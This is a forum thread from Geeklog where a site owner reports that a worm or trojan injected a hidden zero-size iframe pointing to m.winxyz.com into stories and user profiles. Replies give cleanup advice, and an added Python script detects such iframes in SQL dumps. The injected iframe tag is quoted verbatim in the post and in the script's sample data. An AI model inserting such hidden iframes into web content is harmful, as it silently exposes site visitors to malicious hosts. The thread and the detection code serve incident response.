
Geeklog Forums

worm infection



Last night I suffered a worm infection. I use Geeklog 1.4.1. All my stories and comments have an m.winxyz.com reference.

Thank you,


Every new user has this web in his profile: <iframe src=http://m.winxyz.com width=0 height=0></iframe>


Can it be due to FCKeditor SQL injection?



Site Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
No idea where it's coming from but it sounds like files on your server were modified, so it could be that your server was compromised.

Searching Google for "m.winxyz.com" finds a lot of hits on other sites (many not running Geeklog), so it doesn't seem to be limited to Geeklog sites.

Make a database backup and check if that link is in there somewhere. If it isn't, the easiest way would be to remove all the files and upload everything fresh, then use the same database.

bye, Dirk


More info about this.

I detected that the problem comes from a user that has story admin privileges. It seems that this user has a trojan that takes access to my Geeklog site and modifies his stories.

Now this user is suspended, but I'm really worried about this situation if the security of my site depends on my users' security.

This morning, all accounts on my site have their profile modified, also my profile as admin. I can't explain it myself.

The Geeklog files have not been modified.

Thank you,



Forum User
Registered: 05/12/07
Posts: 57
I had a similar problem some time ago. The reason was a compromised FTP account.
The person that used that account had a virus, and from that moment something started inserting lines that pointed to other infected sites in my gl. I downloaded the complete gl, scanned all files to find the code, and then replaced those files.
A faster way to deal with this is to replace all files and use the same old DB, as Dirk told you.
And change the password on your FTP account, just in case :)
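The database check suggested in the thread (look for the injected link in a backup) can be scripted. The following is an added example, not code from any poster or from Geeklog: it scans the lines of a SQL dump for zero-size iframes like the one quoted above and reports which table each was found in. The sample dump lines are constructed, and the table names and the set of sizes treated as hidden are assumptions.

```python
import re
from collections import Counter

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Attribute values may be bare, quoted, or backslash-escaped as in a SQL dump.
ATTR_RE = re.compile(r"""\b(src|width|height)\s*=\s*\\?["']?([^\s"'>\\]+)""",
                     re.IGNORECASE)
INSERT_RE = re.compile(r"INSERT INTO\s+`?(\w+)`?", re.IGNORECASE)
HIDDEN = {"0", "1", "0px", "1px"}  # sizes treated as invisible (assumption)

# Constructed sample dump lines; the table names are assumptions.
SAMPLE_DUMP = [
    "INSERT INTO `gl_stories` VALUES ('s1','Hello "
    "<iframe src=http://m.winxyz.com width=0 height=0></iframe>');",
    "INSERT INTO `gl_stories` VALUES ('s2','Video "
    "<iframe src=\\\"http://video.example/embed\\\" width=\\\"560\\\" "
    "height=\\\"315\\\"></iframe>');",
    "INSERT INTO `gl_userinfo` VALUES (2,"
    "'<IFRAME SRC=\\'http://m.winxyz.com\\' WIDTH=0 HEIGHT=0></IFRAME>');",
]

def find_hidden_iframes(lines):
    """Return (line_no, table, src) for every zero-size iframe found."""
    hits, table = [], None
    for line_no, line in enumerate(lines, 1):
        m = INSERT_RE.search(line)
        if m:
            table = m.group(1)  # remember the table for continuation lines
        for tag in IFRAME_RE.findall(line):
            attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
            # A legitimate embed has a visible size; an injected one hides.
            if attrs.get("width") in HIDDEN and attrs.get("height") in HIDDEN:
                hits.append((line_no, table, attrs.get("src", "")))
    return hits

def summarize(hits):
    """Count hits per (table, src) so the affected tables stand out."""
    return Counter((table, src) for _, table, src in hits)

if __name__ == "__main__":
    for (table, src), n in summarize(find_hidden_iframes(SAMPLE_DUMP)).items():
        print(f"{n:4d}  {table}  {src}")
```

To check a real backup, pass an open file object (opened with `errors="replace"`) instead of `SAMPLE_DUMP`; the same function works on the lines of an uploaded file when comparing against a fresh copy.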
